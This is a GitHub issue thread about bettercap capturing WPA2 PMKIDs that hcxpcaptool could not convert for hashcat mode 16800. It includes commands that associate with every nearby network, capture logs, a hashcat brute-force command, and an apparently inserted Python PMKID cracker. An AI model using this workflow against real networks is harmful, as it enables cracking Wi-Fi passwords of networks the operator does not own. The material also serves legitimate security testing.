PMKID attack not compatible with hashcat mode 16800 #592

Closed
usiegl00 opened this issue Jul 15, 2019 · 18 comments

Comments

@usiegl00

Prerequisites

Done!


PMKID attack not compatible with hashcat mode 16800

Environment

This issue was encountered while following the RSN PMKID based attack guide.

Please provide:

  • bettercap --version: bettercap v2.24.1 (built for darwin amd64 with go1.12.7)
  • sudo bettercap -iface en0
  • wifi.recon on
  • set wifi.show.sort clients desc
  • set ticker.commands 'clear; wifi.show; wifi.assoc all'
  • ticker on
  • Full debug output while reproducing the issue ( sudo bettercap -iface en0 -debug ).
    wifi.recon on
    set wifi.show.sort clients desc
    set ticker.commands 'clear; wifi.show; wifi.assoc all'
    ticker on
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi hopping on channel 7
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [inf] wifi sending association request to AP xxx00000000-2.4G (channel:9 encryption:WPA2)
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi hopping on channel 40
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the aa:aa:aa:aa:aa:aa <-> rr:rr:rr:rr:rr:rr handshake (without PMKID) (anonce:c02feb54973cf00abd42b25533c07a78fb942f71345ca73adb54d19322609270)
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 3/4 of the aa:aa:aa:aa:aa:aa <-> rr:rr:rr:rr:rr:rr handshake (mic:6ef4792d8f11881b40ca117a40254bb9)
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the bb:bb:bb:bb:bb:bb <-> rr:rr:rr:rr:rr:rr handshake (without PMKID) (anonce:bfdda0ff93a80b979b5db3ed01a0b7cd3f6aa9a5f118fddf6f9d7f57798e1978)
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi got frame 1/4 of the cc:cc:cc:cc:cc:cc <-> rr:rr:rr:rr:rr:rr handshake (with PMKID) (anonce:05d32b34b777a5ab3165af3398afd24255c7a492f05bb3b5107d83f9cce8b82a)
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi saving handshake frames to /Users/admin/bettercap-wifi-handshakes.pcap
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [wifi.client.handshake] captured 28:cf:e9:14:11:b1 -> xxx00000000-2.4G (1c:59:9b:ss:ss:ss) RSN PMKID to /Users/admin/bettercap-wifi-handshakes.pcap
    192.168.0.0/24 > 192.168.0.192 » [10:41:06] [sys.log] [dbg] wifi skipping dot11 packet with invalid checksum.
    sudo hcxpcaptool -k pmkid.16800 bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary:

file name........................: bettercap-wifi-handshakes.pcap
file type........................: pcap 2.4
file hardware information........: unknown
file os information..............: unknown
file application information.....: unknown
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
packets inside...................: 9
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 9
EAPOL packets (total)............: 9
EAPOL packets (WPA2).............: 9
PMKIDs (total)...................: 2
PMKIDs (WPA2)....................: 9
PMKIDs from access points........: 2
best PMKIDs......................: 2

  • PMKIDs do not get written to the file

Steps to Reproduce

  1. Make sure there are lots of WPA2 networks nearby
  2. Run commands described in Environment
  3. Get disappointed and resort to using Bettercap 1.6.2 (gem install bettercap) on an open wifi

Expected behavior: Bettercap is compatible with hcxpcaptool and hashcat mode 16800

Actual behavior: You have to resort to mode 16801 which is very cumbersome

If you need anything, don't hesitate to ask!


@evilsocket
Member

fixed by #603

@kam1kaze

Tried to use the latest version compiled from the master branch (with the fix). But I still get no output after the wifi.assoc command.

vagrant@kali:~$ /usr/local/bin/hcxpcaptool -k ./test123 /root/bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary capture file:
---------------------
file name........................: bettercap-wifi-handshakes.pcap
file type........................: pcap 2.4
file hardware information........: unknown
file os information..............: unknown
file application information.....: unknown
network type.....................: DLT_IEEE802_11_RADIO (127)
endianness.......................: little endian
read errors......................: flawless
minimum time stamp...............: 18.08.2019 17:11:58 (GMT)
maximum time stamp...............: 18.08.2019 17:12:03 (GMT)
packets inside...................: 33
skipped packets (damaged)........: 0
packets with GPS data............: 0
packets with FCS.................: 33
EAPOL packets (total)............: 33
EAPOL packets (WPA2).............: 33
PMKIDs (WPA2)....................: 33

@evilsocket
Member

I read PMKIDs (WPA2)....................: 33 ... seems fine, no?

@careyjames

same here, and for the record, is it -z or -k?

hcxpcaptool -E essidlist -I identitylist -U usernamelist -z bettercap-wifi-handshakes.16800 bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary:

file name....................: bettercap-wifi-handshakes.pcap
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness....................: little endian
read errors..................: flawless
packets inside...............: 21
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 21
beacons (with ESSID inside)..: 2
EAPOL packets................: 19
EAPOL PMKIDs.................: 2
best handshakes..............: 2 (ap-less: 0)

0 PMKID(s) written to bettercap-wifi-handshakes.16800

@kam1kaze

@evilsocket looks fine :) but there is no output file at all.
BTW, hcxpcaptool was compiled from the master branch too.

@careyjames

yeah missing output file...

@evilsocket
Member

given that the tool itself reports a correct amount of PMKIDs but is unable to dump them, i'd say it's its bug, not bettercap's ... but i'd dig into it to make sure that's the case 👍

@careyjames

@evilsocket the most awesome, rock star, code god improvement would be a native choice of output file formats directly in bettercap 👌😁🥰💕🐾🏴‍☠️💀

@evilsocket
Member

@careyjames pcap is the most universal format for this stuff, i'd rather not introduce specific parts of code just to support external tools ... especially if those tools can natively read pcaps :)

@careyjames

Ah, so then is there a way to crack PMKID without conversion?

@evilsocket
Member

no, i was referring to hcxpcaptool

@serializingme

serializingme commented Aug 19, 2019

I was having the same problem and using bettercap from master fixed it. Below is the output of hcxpcaptool (version 5.1.4).

hcxpcaptool -z bettercap-wifi-handshakes.pmkid -V bettercap-wifi-handshakes.pcap

reading from bettercap-wifi-handshakes.pcap

summary:
--------
file name....................: bettercap-wifi-handshakes.pcap
file type....................: pcap 2.4
file hardware information....: unknown
file os information..........: unknown
file application information.: unknown
network type.................: DLT_IEEE802_11_RADIO (127)
endianness....................: little endian
read errors..................: flawless
packets inside...............: 27
skipped packets..............: 0
packets with GPS data........: 0
packets with FCS.............: 27
beacons (with ESSID inside)..: 12
probe responses..............: 1
EAPOL packets................: 14
EAPOL PMKIDs.................: 14

13 PMKID(s) written to bettercap-wifi-handshakes.pmkid

And the PMKID file is created.

ls -lh bettercap-wifi-handshakes.pmkid
-rw-r--r-- 1 root root 1.1K Aug 19 22:00 bettercap-wifi-handshakes.pmkid

Hashcat is able to extract the PMKID as well.

hashcat -m16800 -a3 -w3 bettercap-wifi-handshakes.pmkid '?d?d?d?d?d?d?d?d'
hashcat (v4.2.1) starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-4980HQ CPU @ 2.80GHz, skipped.
* Device #2: Iris Pro, 384/1536 MB allocatable, 40MCU
* Device #3: AMD Radeon R9 M370X Compute Engine, 512/2048 MB allocatable, 10MCU

Hashes: 13 digests; 13 unique digests, 13 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates

Applicable optimizers:
* Zero-Byte
* Brute-Force
* Slow-Hash-SIMD-LOOP

Minimum password length supported by kernel: 8
Maximum password length supported by kernel: 63

Watchdog: Temperature abort trigger disabled.

[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit =>

@kam1kaze

@evilsocket here is the same issue in hcxtools ZerBea/hcxtools#109

@ZerBea

ZerBea commented Aug 21, 2019

I got some issue reports that hcxpcaptool doesn't convert hashes from bettercap pcap files, and ran an analysis on them:
ZerBea/hcxtools#109 (comment)
ZerBea/hcxtools#110 (comment)

In both cases bettercap didn't capture the required frames, and there was nothing to convert on the requested option -z or -k.
To convert a PMKID to hashcat's format 16800 we need:
  • ESSID (the BSSID of the PMKID must match this ESSID)
  • MAC of the access point
  • MAC of the client
  • PMKID (not zeroed)

Both bettercap pcap files don't provide a matching ESSID.
Detailed analysis:
ZerBea/hcxtools#110 (comment)
ZerBea/hcxtools#109 (comment)

BTW:
The pcapng format supports comments and much more. For example, hcxdumptool will store attack information and GPS positions in these comment fields. Wireshark and tshark understand and show this.
And there are some more advantages:
https://cloudshark.io/articles/5-reasons-to-move-to-pcapng
In the same way that hcxdumptool uses comment fields, hcxpcaptool stores attack information in the message pair field (hccapx) to control hashcat's nonce-error-corrections.
Also, WLAN traffic contains many useful frames to recover a PSK successfully. Unfortunately bettercap doesn't store them in its pcap file.
@evilsocket if you're interested in determining what bettercap is really missing when it ignores these frames, please mail me and I'll send you some nice examples (to improve bettercap).
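
The four items in the checklist above (ESSID, AP MAC, client MAC, non-zero PMKID) are exactly the four fields of a hashcat -m 16800 line, and the reason the ESSID is mandatory is that it is the PBKDF2 salt for the PMK. The Python below is an added example for this thread, not code from bettercap, hcxtools or hashcat: it derives a PMKID the way an AP does, pulls it out of the PMKID KDE in the Key Data of a constructed EAPOL frame 1/4, builds and validates a 16800 line (rejecting a missing ESSID or a zeroed PMKID), and checks candidate passphrases against it. Every MAC, ESSID and passphrase in it is constructed for the demonstration.

```python
import hashlib
import hmac
from typing import Optional, Tuple

RSN_OUI = bytes.fromhex("000fac")   # IEEE 802.11 RSN OUI used in KDEs
KDE_TYPE_PMKID = 4                  # KDE data type that carries a PMKID


def mac_bytes(mac: str) -> bytes:
    """'02:00:00:00:00:01' -> 6 raw bytes."""
    return bytes.fromhex(mac.replace(":", "").replace("-", ""))


def derive_pmk(passphrase: str, essid: bytes) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes).
    This is the expensive per-candidate step hashcat runs, and it needs the ESSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), essid, 4096, 32)


def compute_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]


def pmkid_from_key_data(key_data: bytes) -> Optional[bytes]:
    """Walk the Key Data of EAPOL frame 1/4 and return the PMKID KDE payload, if any.
    KDE layout: 0xdd, length, OUI 00:0f:ac, data type, data (length covers OUI..data)."""
    i = 0
    while i + 2 <= len(key_data):
        tag, length = key_data[i], key_data[i + 1]
        body = key_data[i + 2 : i + 2 + length]
        if tag == 0xDD and length == 0:       # 0xdd 0x00 ...: padding, nothing follows
            break
        if (tag == 0xDD and length == 20 and len(body) == 20
                and body[:3] == RSN_OUI and body[3] == KDE_TYPE_PMKID):
            return body[4:20]
        i += 2 + length
    return None


def build_16800(pmkid: bytes, mac_ap: bytes, mac_sta: bytes, essid: bytes) -> str:
    """hashcat -m 16800 line: PMKID*MAC_AP*MAC_STA*ESSID_HEX (lowercase hex, no separators)."""
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), essid.hex()])


def parse_16800(line: str) -> Tuple[bytes, bytes, bytes, bytes]:
    """Validate a 16800 line the way a converter must before writing it out."""
    parts = line.strip().split("*")
    if len(parts) != 4:
        raise ValueError("expected PMKID*MAC_AP*MAC_STA*ESSID")
    pmkid, mac_ap, mac_sta, essid = (bytes.fromhex(p) for p in parts)
    if len(pmkid) != 16 or len(mac_ap) != 6 or len(mac_sta) != 6:
        raise ValueError("bad PMKID or MAC length")
    if not 1 <= len(essid) <= 32:
        raise ValueError("ESSID missing: the PMK cannot be derived without it")
    if pmkid == bytes(16):
        raise ValueError("zeroed PMKID: the AP did not supply a usable value")
    return pmkid, mac_ap, mac_sta, essid


def check_candidate(line: str, passphrase: str) -> bool:
    """What hashcat does per candidate: derive PMK, recompute PMKID, compare."""
    pmkid, mac_ap, mac_sta, essid = parse_16800(line)
    guess = compute_pmkid(derive_pmk(passphrase, essid), mac_ap, mac_sta)
    return hmac.compare_digest(guess, pmkid)


def crack(line: str, wordlist) -> Optional[str]:
    """Tiny wordlist attack; returns the matching passphrase or None."""
    for word in wordlist:
        if check_candidate(line, word):
            return word
    return None


# Constructed demo values (not taken from the capture in the issue).
DEMO_ESSID = b"example-2.4G"
DEMO_PASSPHRASE = "tr0ub4dor&3"
DEMO_MAC_AP = "02:00:00:00:00:01"
DEMO_MAC_STA = "02:00:00:00:00:02"


def demo_key_data() -> bytes:
    """Constructed Key Data as an AP would send it in frame 1/4: one PMKID KDE
    followed by the 0xdd/0x00 padding the standard allows."""
    pmk = derive_pmk(DEMO_PASSPHRASE, DEMO_ESSID)
    pmkid = compute_pmkid(pmk, mac_bytes(DEMO_MAC_AP), mac_bytes(DEMO_MAC_STA))
    return bytes([0xDD, 20]) + RSN_OUI + bytes([KDE_TYPE_PMKID]) + pmkid + b"\xdd\x00\x00\x00"


def demo_line() -> str:
    """Extract the PMKID from the constructed frame and emit the 16800 line."""
    pmkid = pmkid_from_key_data(demo_key_data())
    return build_16800(pmkid, mac_bytes(DEMO_MAC_AP), mac_bytes(DEMO_MAC_STA), DEMO_ESSID)


if __name__ == "__main__":
    line = demo_line()
    print(line)
    print("cracked:", crack(line, ["password", "12345678", DEMO_PASSPHRASE]))
```

Run it as a script and it prints the 16800 line followed by the recovered passphrase. The point to take from parse_16800 is the one ZerBea makes: a capture with the PMKID but without a beacon, probe response or association request to supply the ESSID gives the converter a line it cannot write, because nothing can be derived from it.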

@evilsocket
Member

@ZerBea did you try to pull and compile bettercap master? because after the last fix, the required frames are there ... actually, the required frames were there all along, bettercap simply wasn't adding the beacon frame to get the SSID from, which now it adds.

@ZerBea

ZerBea commented Aug 21, 2019

No, I only got the bettercap pcap files and analyzed them. Maybe they were captured by an older bettercap version. We can't determine this, because pcap doesn't support file hardware information, file os information and file application information.
How about adding the ESSID from the association request / reassociation request? Both frames contain much more useful information than the beacon.
Some reassociation requests also contain a PMKID.
How about adding all probe requests from associated clients? Some of them are probing their PSK in the clear.

@evilsocket
Member

I don’t want to sound rude, but how about you send a PR given the strong opinions you have about what should be added to the software? :) The bug seems to be fixed with the aforementioned PR.

@ZerBea

ZerBea commented Aug 21, 2019

Unfortunately I'm not a Go coder, so a PR would be a big disaster. :)
Sent you a PM via gmail.
